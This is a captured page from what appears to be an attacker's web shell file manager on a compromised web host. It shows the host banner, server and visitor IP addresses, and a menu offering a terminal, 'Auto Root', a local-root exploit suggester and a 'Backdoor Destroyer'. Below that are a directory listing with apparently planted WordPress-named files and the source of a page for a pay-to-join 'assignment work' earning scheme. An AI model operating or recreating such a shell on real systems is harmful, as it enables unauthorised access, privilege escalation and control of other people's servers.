Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-03-13 15:14
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
hania
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
user
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.user.ini
578
B
-rw-r--r--
2026-03-13 17:04
add_maintenance_setting.php
669
B
-rw-r--r--
2026-03-12 12:31
check_db.php
161
B
-rw-r--r--
2026-03-12 15:16
check_withdrawals.php
156
B
-rw-r--r--
2026-03-12 15:17
contact.php
6.42
KB
-rw-r--r--
2026-03-28 15:18
database.sql
19.53
KB
-rw-r--r--
2026-03-11 23:07
debug.php
5.09
KB
-rw-r--r--
2026-03-30 15:21
error_log
8.83
KB
-rw-r--r--
2026-03-30 15:27
forgot-password.php
2.16
KB
-rw-r--r--
2026-03-30 15:26
how-it-works.php
1.99
KB
-rw-r--r--
2026-03-11 22:52
index.php
9.37
KB
-rw-r--r--
2026-03-12 00:13
login.php
5.17
KB
-rw-r--r--
2026-03-30 15:28
logout.php
56
B
-rw-r--r--
2026-03-11 23:27
maintenance.php
4.5
KB
-rw-r--r--
2026-03-12 12:39
php.ini
578
B
-rw-r--r--
2026-03-13 17:04
plans.php
2.72
KB
-rw-r--r--
2026-03-12 00:10
register.php
8.79
KB
-rw-r--r--
2026-03-30 15:27
reset-password.php
6.39
KB
-rw-r--r--
2026-03-14 18:08
update_db.php
421
B
-rw-r--r--
2026-03-12 15:17
update_withdrawals.php
417
B
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once 'includes/config.php'; require_once 'includes/header.php'; ?> <div style="padding-top:100px;"> <section> <h2 class="section-title">How It Works</h2> <div class="grid" style="grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));"> <div class="step-card"> <i class="fas fa-user-plus step-icon"></i> <h3>Step 1</h3> <h4 style="margin:10px 0; color:var(--text-muted);">Create Your Account</h4> <p style="font-size:0.9rem;">Sign up quickly using your email to join the Assignment Work Zone.</p> </div> <div class="step-card"> <i class="fas fa-box step-icon"></i> <h3>Step 2</h3> <h4 style="margin:10px 0; color:var(--text-muted);">Choose a Plan</h4> <p style="font-size:0.9rem;">Select from our affordable and premium packages based on your target earnings.</p> </div> <div class="step-card"> <i class="fas fa-wallet step-icon"></i> <h3>Step 3</h3> <h4 style="margin:10px 0; color:var(--text-muted);">Pay for the Plan</h4> <p style="font-size:0.9rem;">Upload your payment proof securely via EasyPaisa or JazzCash for account activation.</p> </div> <div class="step-card"> <i class="fas fa-file-upload step-icon"></i> <h3>Step 4</h3> <h4 style="margin:10px 0; color:var(--text-muted);">Submit & Earn</h4> <p style="font-size:0.9rem;">Receive assignments daily, submit completed work, and grow your balance instantly!</p> </div> </div> <div style="text-align:center; margin-top:50px;"> <a href="register.php" class="btn-primary" style="padding:15px 40px; font-size:1.1rem;">Get Started Now</a> </div> </section> </div> <?php require_once 'includes/footer.php'; ?>